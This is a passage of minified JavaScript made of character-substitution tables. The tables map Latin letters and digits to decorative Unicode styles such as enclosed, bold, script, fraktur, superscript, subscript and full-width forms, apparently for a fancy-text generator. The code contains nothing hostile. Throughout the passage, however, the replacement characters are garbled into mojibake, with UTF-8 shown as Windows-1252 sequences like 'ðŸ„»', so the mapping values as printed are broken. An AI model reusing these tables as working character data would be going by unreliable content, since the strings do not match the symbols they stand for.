        l: "ðŸ„»",
        m: "ðŸ„¼",
        n: "ðŸ„½",
        o: "ðŸ„¾",
        p: "ðŸ„¿",
        q: "ðŸ…€",
        r: "ðŸ…",
        s: "ðŸ…‚",
        t: "ðŸ…ƒ",
        u: "ðŸ…„",
        v: "ðŸ……",
        w: "ðŸ…†",
        x: "ðŸ…‡",
        y: "ðŸ…ˆ",
        z: "ðŸ…‰",
        A: "ðŸ„°",
        B: "ðŸ„±",
        C: "ðŸ„²",
        D: "ðŸ„³",
        E: "ðŸ„´",
        F: "ðŸ„µ",
        G: "ðŸ„¶",
        H: "ðŸ„·",
        I: "ðŸ„¸",
        J: "ðŸ„¹",
        K: "ðŸ„º",
        L: "ðŸ„»",
        M: "ðŸ„¼",
        N: "ðŸ„½",
        O: "ðŸ„¾",
        P: "ðŸ„¿",
        Q: "ðŸ…€",
        R: "ðŸ…",
        S: "ðŸ…‚",
        T: "ðŸ…ƒ",
        U: "ðŸ…„",
        V: "ðŸ……",
        W: "ðŸ…†",
        X: "ðŸ…‡",
        Y: "ðŸ…ˆ",
        Z: "ðŸ…‰"
    }, v = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "á—",
        b: "á°",
        c: "áˆ",
        d: "áŽ´",
        e: "á‹",
        f: "áŽ¦",
        g: "áŽ¶",
        h: "á‚",
        i: "áŽ¥",
        j: "á ",
        k: "á¦",
        l: "á",
        m: "áŽ·",
        n: "á",
        o: "áŽ§",
        p: "áŽ®",
        q: "áŽ¤",
        r: "á’",
        s: "á•",
        t: "á–",
        u: "á¬",
        v: "á‰",
        w: "á‡",
        x: "áŒ€",
        y: "áŽ©",
        z: "áš",
        A: "á—",
        B: "á°",
        C: "áˆ",
        D: "áŽ´",
        E: "á‹",
        F: "áŽ¦",
        G: "áŽ¶",
        H: "á‚",
        I: "áŽ¥",
        J: "á ",
        K: "á¦",
        L: "á",
        M: "áŽ·",
        N: "á",
        O: "áŽ§",
        P: "áŽ®",
        Q: "áŽ¤",
        R: "á’",
        S: "á•",
        T: "á–",
        U: "á¬",
        V: "á‰",
        W: "á‡",
        X: "áŒ€",
        Y: "áŽ©",
        Z: "áš"
    }, S = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "á—©",
        b: "á—·",
        c: "á‘•",
        d: "á—ª",
        e: "E",
        f: "á–´",
        g: "G",
        h: "á•¼",
        i: "I",
        j: "á’",
        k: "K",
        l: "á’ª",
        m: "á—°",
        n: "á‘Ž",
        o: "O",
        p: "á‘­",
        q: "á‘«",
        r: "á–‡",
        s: "á”•",
        t: "T",
        u: "á‘Œ",
        v: "á¯",
        w: "á—¯",
        x: "á™­",
        y: "Y",
        z: "á˜”",
        A: "á—©",
        B: "á—·",
        C: "á‘•",
        D: "á—ª",
        E: "E",
        F: "á–´",
        G: "G",
        H: "á•¼",
        I: "I",
        J: "á’",
        K: "K",
        L: "á’ª",
        M: "á—°",
        N: "á‘Ž",
        O: "O",
        P: "á‘­",
        Q: "á‘«",
        R: "á–‡",
        S: "á”•",
        T: "T",
        U: "á‘Œ",
        V: "á¯",
        W: "á—¯",
        X: "á™­",
        Y: "Y",
        Z: "á˜”"
    }, y = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "ÇŸ",
        b: "É®",
        c: "Æˆ",
        d: "É–",
        e: "É›",
        f: "Ê„",
        g: "É¢",
        h: "É¦",
        i: "É¨",
        j: "Ê",
        k: "Ó„",
        l: "ÊŸ",
        m: "Ê",
        n: "Õ¼",
        o: "Ö…",
        p: "Ö„",
        q: "Õ¦",
        r: "Ê€",
        s: "Ö†",
        t: "È¶",
        u: "ÊŠ",
        v: "Ê‹",
        w: "Õ¡",
        x: "Ó¼",
        y: "Ê",
        z: "Ê",
        A: "ÇŸ",
        B: "É®",
        C: "Æˆ",
        D: "É–",
        E: "É›",
        F: "Ê„",
        G: "É¢",
        H: "É¦",
        I: "É¨",
        J: "Ê",
        K: "Ó„",
        L: "ÊŸ",
        M: "Ê",
        N: "Õ¼",
        O: "Ö…",
        P: "Ö„",
        Q: "Õ¦",
        R: "Ê€",
        S: "Ö†",
        T: "È¶",
        U: "ÊŠ",
        V: "Ê‹",
        W: "Õ¡",
        X: "Ó¼",
        Y: "Ê",
        Z: "Ê"
    }, b = {
        0: "ðŸ¶",
        1: "ðŸ·",
        2: "ðŸ¸",
        3: "ðŸ¹",
        4: "ðŸº",
        5: "ðŸ»",
        6: "ðŸ¼",
        7: "ðŸ½",
        8: "ðŸ¾",
        9: "ðŸ¿",
        a: "ðšŠ",
        b: "ðš‹",
        c: "ðšŒ",
        d: "ðš",
        e: "ðšŽ",
        f: "ðš",
        g: "ðš",
        h: "ðš‘",
        i: "ðš’",
        j: "ðš“",
        k: "ðš”",
        l: "ðš•",
        m: "ðš–",
        n: "ðš—",
        o: "ðš˜",
        p: "ðš™",
        q: "ðšš",
        r: "ðš›",
        s: "ðšœ",
        t: "ðš",
        u: "ðšž",
        v: "ðšŸ",
        w: "ðš ",
        x: "ðš¡",
        y: "ðš¢",
        z: "ðš£",
        A: "ð™°",
        B: "ð™±",
        C: "ð™²",
        D: "ð™³",
        E: "ð™´",
        F: "ð™µ",
        G: "ð™¶",
        H: "ð™·",
        I: "ð™¸",
        J: "ð™¹",
        K: "ð™º",
        L: "ð™»",
        M: "ð™¼",
        N: "ð™½",
        O: "ð™¾",
        P: "ð™¿",
        Q: "ðš€",
        R: "ðš",
        S: "ðš‚",
        T: "ðšƒ",
        U: "ðš„",
        V: "ðš…",
        W: "ðš†",
        X: "ðš‡",
        Y: "ðšˆ",
        Z: "ðš‰"
    }, w = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "ð™–",
        b: "ð™—",
        c: "ð™˜",
        d: "ð™™",
        e: "ð™š",
        f: "ð™›",
        g: "ð™œ",
        h: "ð™",
        i: "ð™ž",
        j: "ð™Ÿ",
        k: "ð™ ",
        l: "ð™¡",
        m: "ð™¢",
        n: "ð™£",
        o: "ð™¤",
        p: "ð™¥",
        q: "ð™¦",
        r: "ð™§",
        s: "ð™¨",
        t: "ð™©",
        u: "ð™ª",
        v: "ð™«",
        w: "ð™¬",
        x: "ð™­",
        y: "ð™®",
        z: "ð™¯",
        A: "ð˜¼",
        B: "ð˜½",
        C: "ð˜¾",
        D: "ð˜¿",
        E: "ð™€",
        F: "ð™",
        G: "ð™‚",
        H: "ð™ƒ",
        I: "ð™„",
        J: "ð™…",
        K: "ð™†",
        L: "ð™‡",
        M: "ð™ˆ",
        N: "ð™‰",
        O: "ð™Š",
        P: "ð™‹",
        Q: "ð™Œ",
        R: "ð™",
        S: "ð™Ž",
        T: "ð™",
        U: "ð™",
        V: "ð™‘",
        W: "ð™’",
        X: "ð™“",
        Y: "ð™”",
        Z: "ð™•"
    }, j = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "ð’‚",
        b: "ð’ƒ",
        c: "ð’„",
        d: "ð’…",
        e: "ð’†",
        f: "ð’‡",
        g: "ð’ˆ",
        h: "ð’‰",
        i: "ð’Š",
        j: "ð’‹",
        k: "ð’Œ",
        l: "ð’",
        m: "ð’Ž",
        n: "ð’",
        o: "ð’",
        p: "ð’‘",
        q: "ð’’",
        r: "ð’“",
        s: "ð’”",
        t: "ð’•",
        u: "ð’–",
        v: "ð’—",
        w: "ð’˜",
        x: "ð’™",
        y: "ð’š",
        z: "ð’›",
        A: "ð‘¨",
        B: "ð‘©",
        C: "ð‘ª",
        D: "ð‘«",
        E: "ð‘¬",
        F: "ð‘­",
        G: "ð‘®",
        H: "ð‘¯",
        I: "ð‘°",
        J: "ð‘±",
        K: "ð‘²",
        L: "ð‘³",
        M: "ð‘´",
        N: "ð‘µ",
        O: "ð‘¶",
        P: "ð‘·",
        Q: "ð‘¸",
        R: "ð‘¹",
        S: "ð‘º",
        T: "ð‘»",
        U: "ð‘¼",
        V: "ð‘½",
        W: "ð‘¾",
        X: "ð‘¿",
        Y: "ð’€",
        Z: "ð’"
    }, M = {
        0: "ðŸŽ",
        1: "ðŸ",
        2: "ðŸ",
        3: "ðŸ‘",
        4: "ðŸ’",
        5: "ðŸ“",
        6: "ðŸ”",
        7: "ðŸ•",
        8: "ðŸ–",
        9: "ðŸ—",
        a: "ðš",
        b: "ð›",
        c: "ðœ",
        d: "ð",
        e: "ðž",
        f: "ðŸ",
        g: "ð ",
        h: "ð¡",
        i: "ð¢",
        j: "ð£",
        k: "ð¤",
        l: "ð¥",
        m: "ð¦",
        n: "ð§",
        o: "ð¨",
        p: "ð©",
        q: "ðª",
        r: "ð«",
        s: "ð¬",
        t: "ð­",
        u: "ð®",
        v: "ð¯",
        w: "ð°",
        x: "ð±",
        y: "ð²",
        z: "ð³",
        A: "ð€",
        B: "ð",
        C: "ð‚",
        D: "ðƒ",
        E: "ð„",
        F: "ð…",
        G: "ð†",
        H: "ð‡",
        I: "ðˆ",
        J: "ð‰",
        K: "ðŠ",
        L: "ð‹",
        M: "ðŒ",
        N: "ð",
        O: "ðŽ",
        P: "ð",
        Q: "ð",
        R: "ð‘",
        S: "ð’",
        T: "ð“",
        U: "ð”",
        V: "ð•",
        W: "ð–",
        X: "ð—",
        Y: "ð˜",
        Z: "ð™"
    }, A = {
        0: "ðŸ¬",
        1: "ðŸ­",
        2: "ðŸ®",
        3: "ðŸ¯",
        4: "ðŸ°",
        5: "ðŸ±",
        6: "ðŸ²",
        7: "ðŸ³",
        8: "ðŸ´",
        9: "ðŸµ",
        a: "ð—®",
        b: "ð—¯",
        c: "ð—°",
        d: "ð—±",
        e: "ð—²",
        f: "ð—³",
        g: "ð—´",
        h: "ð—µ",
        i: "ð—¶",
        j: "ð—·",
        k: "ð—¸",
        l: "ð—¹",
        m: "ð—º",
        n: "ð—»",
        o: "ð—¼",
        p: "ð—½",
        q: "ð—¾",
        r: "ð—¿",
        s: "ð˜€",
        t: "ð˜",
        u: "ð˜‚",
        v: "ð˜ƒ",
        w: "ð˜„",
        x: "ð˜…",
        y: "ð˜†",
        z: "ð˜‡",
        A: "ð—”",
        B: "ð—•",
        C: "ð—–",
        D: "ð——",
        E: "ð—˜",
        F: "ð—™",
        G: "ð—š",
        H: "ð—›",
        I: "ð—œ",
        J: "ð—",
        K: "ð—ž",
        L: "ð—Ÿ",
        M: "ð— ",
        N: "ð—¡",
        O: "ð—¢",
        P: "ð—£",
        Q: "ð—¤",
        R: "ð—¥",
        S: "ð—¦",
        T: "ð—§",
        U: "ð—¨",
        V: "ð—©",
        W: "ð—ª",
        X: "ð—«",
        Y: "ð—¬",
        Z: "ð—­"
    }, T = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "ð˜¢",
        b: "ð˜£",
        c: "ð˜¤",
        d: "ð˜¥",
        e: "ð˜¦",
        f: "ð˜§",
        g: "ð˜¨",
        h: "ð˜©",
        i: "ð˜ª",
        j: "ð˜«",
        k: "ð˜¬",
        l: "ð˜­",
        m: "ð˜®",
        n: "ð˜¯",
        o: "ð˜°",
        p: "ð˜±",
        q: "ð˜²",
        r: "ð˜³",
        s: "ð˜´",
        t: "ð˜µ",
        u: "ð˜¶",
        v: "ð˜·",
        w: "ð˜¸",
        x: "ð˜¹",
        y: "ð˜º",
        z: "ð˜»",
        A: "ð˜ˆ",
        B: "ð˜‰",
        C: "ð˜Š",
        D: "ð˜‹",
        E: "ð˜Œ",
        F: "ð˜",
        G: "ð˜Ž",
        H: "ð˜",
        I: "ð˜",
        J: "ð˜‘",
        K: "ð˜’",
        L: "ð˜“",
        M: "ð˜”",
        N: "ð˜•",
        O: "ð˜–",
        P: "ð˜—",
        Q: "ð˜˜",
        R: "ð˜™",
        S: "ð˜š",
        T: "ð˜›",
        U: "ð˜œ",
        V: "ð˜",
        W: "ð˜ž",
        X: "ð˜Ÿ",
        Y: "ð˜ ",
        Z: "ð˜¡"
    }, B = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "Î±",
        b: "á‚¦",
        c: "Æˆ",
        d: "Ôƒ",
        e: "Ò½",
        f: "Ï",
        g: "É ",
        h: "Ô‹",
        i: "Î¹",
        j: "Ê",
        k: "Æ™",
        l: "Ê…",
        m: "É±",
        n: "É³",
        o: "Ïƒ",
        p: "Ï",
        q: "Ï™",
        r: "É¾",
        s: "Ê‚",
        t: "Æš",
        u: "Ï…",
        v: "Ê‹",
        w: "É¯",
        x: "x",
        y: "áƒ§",
        z: "È¥",
        A: "A",
        B: "B",
        C: "C",
        D: "D",
        E: "E",
        F: "F",
        G: "G",
        H: "H",
        I: "I",
        J: "J",
        K: "K",
        L: "L",
        M: "M",
        N: "N",
        O: "O",
        P: "P",
        Q: "Q",
        R: "R",
        S: "S",
        T: "T",
        U: "U",
        V: "V",
        W: "W",
        X: "X",
        Y: "Y",
        Z: "Z"
    }, Z = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "â‚³",
        b: "à¸¿",
        c: "â‚µ",
        d: "Ä",
        e: "É†",
        f: "â‚£",
        g: "â‚²",
        h: "â±§",
        i: "Å‚",
        j: "J",
        k: "â‚­",
        l: "â± ",
        m: "â‚¥",
        n: "â‚¦",
        o: "Ã˜",
        p: "â‚±",
        q: "Q",
        r: "â±¤",
        s: "â‚´",
        t: "â‚®",
        u: "É„",
        v: "V",
        w: "â‚©",
        x: "Ó¾",
        y: "ÉŽ",
        z: "â±«",
        A: "â‚³",
        B: "à¸¿",
        C: "â‚µ",
        D: "Ä",
        E: "É†",
        F: "â‚£",
        G: "â‚²",
        H: "â±§",
        I: "Å‚",
        J: "J",
        K: "â‚­",
        L: "â± ",
        M: "â‚¥",
        N: "â‚¦",
        O: "Ã˜",
        P: "â‚±",
        Q: "Q",
        R: "â±¤",
        S: "â‚´",
        T: "â‚®",
        U: "É„",
        V: "V",
        W: "â‚©",
        X: "Ó¾",
        Y: "ÉŽ",
        Z: "â±«"
    }, G = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "Ã¥",
        b: "ÃŸ",
        c: "Â¢",
        d: "Ã",
        e: "Ãª",
        f: "Â£",
        g: "g",
        h: "h",
        i: "Ã¯",
        j: "j",
        k: "k",
        l: "l",
        m: "m",
        n: "Ã±",
        o: "Ã°",
        p: "Ã¾",
        q: "q",
        r: "r",
        s: "Â§",
        t: "â€ ",
        u: "Âµ",
        v: "v",
        w: "w",
        x: "x",
        y: "Â¥",
        z: "z",
        A: "Ã„",
        B: "ÃŸ",
        C: "Ã‡",
        D: "Ã",
        E: "Ãˆ",
        F: "Â£",
        G: "G",
        H: "H",
        I: "ÃŒ",
        J: "J",
        K: "K",
        L: "L",
        M: "M",
        N: "Ã±",
        O: "Ã–",
        P: "Ã¾",
        Q: "Q",
        R: "R",
        S: "Â§",
        T: "â€ ",
        U: "Ãš",
        V: "V",
        W: "W",
        X: "Ã—",
        Y: "Â¥",
        Z: "Z"
    }, I = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "Î±",
        b: "Ð²",
        c: "Â¢",
        d: "âˆ‚",
        e: "Ñ”",
        f: "Æ’",
        g: "g",
        h: "Ð½",
        i: "Î¹",
        j: "× ",
        k: "Ðº",
        l: "â„“",
        m: "Ð¼",
        n: "Î·",
        o: "Ïƒ",
        p: "Ï",
        q: "q",
        r: "Ñ",
        s: "Ñ•",
        t: "Ñ‚",
        u: "Ï…",
        v: "Î½",
        w: "Ï‰",
        x: "Ï‡",
        y: "Ñƒ",
        z: "z",
        A: "Î±",
        B: "Ð²",
        C: "Â¢",
        D: "âˆ‚",
        E: "Ñ”",
        F: "Æ’",
        G: "g",
        H: "Ð½",
        I: "Î¹",
        J: "× ",
        K: "Ðº",
        L: "â„“",
        M: "Ð¼",
        N: "Î·",
        O: "Ïƒ",
        P: "Ï",
        Q: "q",
        R: "Ñ",
        S: "Ñ•",
        T: "Ñ‚",
        U: "Ï…",
        V: "Î½",
        W: "Ï‰",
        X: "Ï‡",
        Y: "Ñƒ",
        Z: "z"
    }, q = {
        0: "âŠ˜",
        1: "ðŸ™",
        2: "Ï©",
        3: "Ó ",
        4: "à¥«",
        5: "Æ¼",
        6: "Ï¬",
        7: "7",
        8: "ðŸ ",
        9: "à¥¯",
        a: "Ä…",
        b: "Ò",
        c: "Ã§",
        d: "Õª",
        e: "Ò½",
        f: "Æ’",
        g: "Ö",
        h: "Õ°",
        i: "Ã¬",
        j: "Ê",
        k: "ÒŸ",
        l: "Ó€",
        m: "Ê",
        n: "Õ²",
        o: "Ö…",
        p: "Ö„",
        q: "Õ¦",
        r: "É¾",
        s: "Ê‚",
        t: "Õ§",
        u: "Õ´",
        v: "Ñµ",
        w: "Õ¡",
        x: "Ã—",
        y: "Õ¾",
        z: "Õ€",
        A: "Èº",
        B: "Î²",
        C: "â†»",
        D: "áŽ ",
        E: "Æ",
        F: "Æ‘",
        G: "Æ“",
        H: "Ç¶",
        I: "Ä¯",
        J: "Ù„",
        K: "Ò ",
        L: "êˆ",
        M: "â±®",
        N: "áž ",
        O: "à¶§",
        P: "Ï†",
        Q: "Ò¨",
        R: "à½ ",
        S: "Ïš",
        T: "Í²",
        U: "Ô±",
        V: "á»¼",
        W: "à°š",
        X: "áƒ¯",
        Y: "Ó‹",
        Z: "É€"
    }, k = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "Î›",
        b: "B",
        c: "á„ƒ",
        d: "D",
        e: "Î£",
        f: "F",
        g: "G",
        h: "Î‰",
        i: "I",
        j: "J",
        k: "K",
        l: "á„‚",
        m: "M",
        n: "ÐŸ",
        o: "Ó¨",
        p: "P",
        q: "Q",
        r: "Ð¯",
        s: "Æ§",
        t: "Æ¬",
        u: "Ð¦",
        v: "V",
        w: "Ð©",
        x: "X",
        y: "Y",
        z: "Z",
        A: "Î›",
        B: "B",
        C: "á„ƒ",
        D: "D",
        E: "Î£",
        F: "F",
        G: "G",
        H: "Î‰",
        I: "I",
        J: "J",
        K: "K",
        L: "á„‚",
        M: "M",
        N: "ÐŸ",
        O: "Ó¨",
        P: "P",
        Q: "Q",
        R: "Ð¯",
        S: "Æ§",
        T: "Æ¬",
        U: "Ð¦",
        V: "V",
        W: "Ð©",
        X: "X",
        Y: "Y",
        Z: "Z"
    }, z = {
        0: "â‚€",
        1: "â‚",
        2: "â‚‚",
        3: "â‚ƒ",
        4: "â‚„",
        5: "â‚…",
        6: "â‚†",
        7: "â‚‡",
        8: "â‚ˆ",
        9: "â‚‰",
        a: "â‚",
        b: "b",
        c: "c",
        d: "d",
        e: "â‚‘",
        f: "f",
        g: "g",
        h: "â‚•",
        i: "áµ¢",
        j: "â±¼",
        k: "â‚–",
        l: "â‚—",
        m: "â‚˜",
        n: "â‚™",
        o: "â‚’",
        p: "â‚š",
        q: "q",
        r: "áµ£",
        s: "â‚›",
        t: "â‚œ",
        u: "áµ¤",
        v: "áµ¥",
        w: "w",
        x: "â‚“",
        y: "y",
        z: "z",
        A: "â‚",
        B: "B",
        C: "C",
        D: "D",
        E: "â‚‘",
        F: "F",
        G: "G",
        H: "â‚•",
        I: "áµ¢",
        J: "â±¼",
        K: "â‚–",
        L: "â‚—",
        M: "â‚˜",
        N: "â‚™",
        O: "â‚’",
        P: "â‚š",
        Q: "Q",
        R: "áµ£",
        S: "â‚›",
        T: "â‚œ",
        U: "áµ¤",
        V: "áµ¥",
        W: "W",
        X: "â‚“",
        Y: "Y",
        Z: "Z",
        "+": "â‚Š",
        "-": "â‚‹",
        "=": "â‚Œ",
        "(": "â‚",
        ")": "â‚Ž"
    }, H = {
        0: "â°",
        1: "Â¹",
        2: "Â²",
        3: "Â³",
        4: "â´",
        5: "âµ",
        6: "â¶",
        7: "â·",
        8: "â¸",
        9: "â¹",
        a: "áµƒ",
        b: "áµ‡",
        c: "á¶œ",
        d: "áµˆ",
        e: "áµ‰",
        f: "á¶ ",
        g: "áµ",
        h: "Ê°",
        i: "â±",
        j: "Ê²",
        k: "áµ",
        l: "Ë¡",
        m: "áµ",
        n: "â¿",
        o: "áµ’",
        p: "áµ–",
        q: "q",
        r: "Ê³",
        s: "Ë¢",
        t: "áµ—",
        u: "áµ˜",
        v: "áµ›",
        w: "Ê·",
        x: "Ë£",
        y: "Ê¸",
        z: "á¶»",
        A: "á´¬",
        B: "á´®",
        C: "á¶œ",
        D: "á´°",
        E: "á´±",
        F: "á¶ ",
        G: "á´³",
        H: "á´´",
        I: "á´µ",
        J: "á´¶",
        K: "á´·",
        L: "á´¸",
        M: "á´¹",
        N: "á´º",
        O: "á´¼",
        P: "á´¾",
        Q: "Q",
        R: "á´¿",
        S: "Ë¢",
        T: "áµ€",
        U: "áµ",
        V: "â±½",
        W: "áµ‚",
        X: "Ë£",
        Y: "Ê¸",
        Z: "á¶»",
        "+": "âº",
        "-": "â»",
        "=": "â¼",
        "(": "â½",
        ")": "â¾"
    }, L = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "à¸„",
        b: "à¹’",
        c: "Ï‚",
        d: "à¹”",
        e: "Ñ”",
        f: "Å¦",
        g: "ï»®",
        h: "Ñ’",
        i: "à¹€",
        j: "×Ÿ",
        k: "Ðº",
        l: "É­",
        m: "à¹“",
        n: "à¸ ",
        o: "à¹",
        p: "×§",
        q: "á»£",
        r: "Ð³",
        s: "à¸£",
        t: "Õ‡",
        u: "à¸¢",
        v: "×©",
        w: "à¸¬",
        x: "×",
        y: "×¥",
        z: "Õ¹",
        A: "à¸„",
        B: "à¹’",
        C: "Ï‚",
        D: "à¹”",
        E: "Ñ”",
        F: "Å¦",
        G: "ï»®",
        H: "Ñ’",
        I: "à¹€",
        J: "×Ÿ",
        K: "Ðº",
        L: "É­",
        M: "à¹“",
        N: "à¸ ",
        O: "à¹",
        P: "×§",
        Q: "á»£",
        R: "Ð³",
        S: "à¸£",
        T: "Õ‡",
        U: "à¸¢",
        V: "×©",
        W: "à¸¬",
        X: "×",
        Y: "×¥",
        Z: "Õ¹"
    }, F = {
        0: "ðŸ˜",
        1: "ðŸ™",
        2: "ðŸš",
        3: "ðŸ›",
        4: "ðŸœ",
        5: "ðŸ",
        6: "ðŸž",
        7: "ðŸŸ",
        8: "ðŸ ",
        9: "ðŸ¡",
        a: "ð•’",
        b: "ð•“",
        c: "ð•”",
        d: "ð••",
        e: "ð•–",
        f: "ð•—",
        g: "ð•˜",
        h: "ð•™",
        i: "ð•š",
        j: "ð•›",
        k: "ð•œ",
        l: "ð•",
        m: "ð•ž",
        n: "ð•Ÿ",
        o: "ð• ",
        p: "ð•¡",
        q: "ð•¢",
        r: "ð•£",
        s: "ð•¤",
        t: "ð•¥",
        u: "ð•¦",
        v: "ð•§",
        w: "ð•¨",
        x: "ð•©",
        y: "ð•ª",
        z: "ð•«",
        A: "ð”¸",
        B: "ð”¹",
        C: "â„‚",
        D: "ð”»",
        E: "ð”¼",
        F: "ð”½",
        G: "ð”¾",
        H: "â„",
        I: "ð•€",
        J: "ð•",
        K: "ð•‚",
        L: "ð•ƒ",
        M: "ð•„",
        N: "â„•",
        O: "ð•†",
        P: "â„™",
        Q: "â„š",
        R: "â„",
        S: "ð•Š",
        T: "ð•‹",
        U: "ð•Œ",
        V: "ð•",
        W: "ð•Ž",
        X: "ð•",
        Y: "ð•",
        Z: "â„¤"
    }, K = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "ð–†",
        b: "ð–‡",
        c: "ð–ˆ",
        d: "ð–‰",
        e: "ð–Š",
        f: "ð–‹",
        g: "ð–Œ",
        h: "ð–",
        i: "ð–Ž",
        j: "ð–",
        k: "ð–",
        l: "ð–‘",
        m: "ð–’",
        n: "ð–“",
        o: "ð–”",
        p: "ð–•",
        q: "ð––",
        r: "ð–—",
        s: "ð–˜",
        t: "ð–™",
        u: "ð–š",
        v: "ð–›",
        w: "ð–œ",
        x: "ð–",
        y: "ð–ž",
        z: "ð–Ÿ",
        A: "ð•¬",
        B: "ð•­",
        C: "ð•®",
        D: "ð•¯",
        E: "ð•°",
        F: "ð•±",
        G: "ð•²",
        H: "ð•³",
        I: "ð•´",
        J: "ð•µ",
        K: "ð•¶",
        L: "ð•·",
        M: "ð•¸",
        N: "ð•¹",
        O: "ð•º",
        P: "ð•»",
        Q: "ð•¼",
        R: "ð•½",
        S: "ð•¾",
        T: "ð•¿",
        U: "ð–€",
        V: "ð–",
        W: "ð–‚",
        X: "ð–ƒ",
        Y: "ð–„",
        Z: "ð–…"
    }, D = {
        q: "ðŸ†€",
        w: "ðŸ††",
        e: "ðŸ…´",
        r: "ðŸ†",
        t: "ðŸ†ƒ",
        y: "ðŸ†ˆ",
        u: "ðŸ†„",
        i: "ðŸ…¸",
        o: "ðŸ…¾",
        p: "ðŸ…¿",
        a: "ðŸ…°",
        s: "ðŸ†‚",
        d: "ðŸ…³",
        f: "ðŸ…µ",
        g: "ðŸ…¶",
        h: "ðŸ…·",
        j: "ðŸ…¹",
        k: "ðŸ…º",
        l: "ðŸ…»",
        z: "ðŸ†‰",
        x: "ðŸ†‡",
        c: "ðŸ…²",
        v: "ðŸ†…",
        b: "ðŸ…±",
        n: "ðŸ…½",
        m: "ðŸ…¼"
    }, X = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "ð“ª",
        b: "ð“«",
        c: "ð“¬",
        d: "ð“­",
        e: "ð“®",
        f: "ð“¯",
        g: "ð“°",
        h: "ð“±",
        i: "ð“²",
        j: "ð“³",
        k: "ð“´",
        l: "ð“µ",
        m: "ð“¶",
        n: "ð“·",
        o: "ð“¸",
        p: "ð“¹",
        q: "ð“º",
        r: "ð“»",
        s: "ð“¼",
        t: "ð“½",
        u: "ð“¾",
        v: "ð“¿",
        w: "ð”€",
        x: "ð”",
        y: "ð”‚",
        z: "ð”ƒ",
        A: "ð“",
        B: "ð“‘",
        C: "ð“’",
        D: "ð““",
        E: "ð“”",
        F: "ð“•",
        G: "ð“–",
        H: "ð“—",
        I: "ð“˜",
        J: "ð“™",
        K: "ð“š",
        L: "ð“›",
        M: "ð“œ",
        N: "ð“",
        O: "ð“ž",
        P: "ð“Ÿ",
        Q: "ð“ ",
        R: "ð“¡",
        S: "ð“¢",
        T: "ð“£",
        U: "ð“¤",
        V: "ð“¥",
        W: "ð“¦",
        X: "ð“§",
        Y: "ð“¨",
        Z: "ð“©"
    }, V = {
        a: "ð”ž",
        b: "ð”Ÿ",
        c: "ð” ",
        d: "ð”¡",
        e: "ð”¢",
        f: "ð”£",
        g: "ð”¤",
        h: "ð”¥",
        i: "ð”¦",
        j: "ð”§",
        k: "ð”¨",
        l: "ð”©",
        m: "ð”ª",
        n: "ð”«",
        o: "ð”¬",
        p: "ð”­",
        q: "ð”®",
        r: "ð”¯",
        s: "ð”°",
        t: "ð”±",
        u: "ð”²",
        v: "ð”³",
        w: "ð”´",
        x: "ð”µ",
        y: "ð”¶",
        z: "ð”·",
        A: "ð”„",
        B: "ð”…",
        C: "â„­",
        D: "ð”‡",
        E: "ð”ˆ",
        F: "ð”‰",
        G: "ð”Š",
        H: "â„Œ",
        I: "â„‘",
        J: "ð”",
        K: "ð”Ž",
        L: "ð”",
        M: "ð”",
        N: "ð”‘",
        O: "ð”’",
        P: "ð”“",
        Q: "ð””",
        R: "â„œ",
        S: "ð”–",
        T: "ð”—",
        U: "ð”˜",
        V: "ð”™",
        W: "ð”š",
        X: "ð”›",
        Y: "ð”œ",
        Z: "â„¨"
    }, Y = {
        "`": "`",
        1: "ï¼‘",
        2: "ï¼’",
        3: "ï¼“",
        4: "ï¼”",
        5: "ï¼•",
        6: "ï¼–",
        7: "ï¼—",
        8: "ï¼˜",
        9: "ï¼™",
        0: "ï¼",
        "-": "ï¼",
        "=": "ï¼",
        "~": "~",
        "!": "ï¼",
        "@": "ï¼ ",
        "#": "ï¼ƒ",
        $: "ï¼„",
        "%": "ï¼…",
        "^": "^",
        "&": "ï¼†",
        "*": "ï¼Š",
        "(": "ï¼ˆ",
        ")": "ï¼‰",
        _: "_",
        "+": "ï¼‹",
        q: "ï½‘",
        w: "ï½—",
        e: "ï½…",
        r: "ï½’",
        t: "ï½”",
        y: "ï½™",
        u: "ï½•",
        i: "ï½‰",
        o: "ï½",
        p: "ï½",
        "[": "[",
        "]": "]",
        "\\": "\\",
        Q: "ï¼±",
        W: "ï¼·",
        E: "ï¼¥",
        R: "ï¼²",
        T: "ï¼´",
        Y: "ï¼¹",
        U: "ï¼µ",
        I: "ï¼©",
        O: "ï¼¯",
        P: "ï¼°",
        "{": "{",
        "}": "}",
        "|": "|",
        a: "ï½",
        s: "ï½“",
        d: "ï½„",
        f: "ï½†",
        g: "ï½‡",
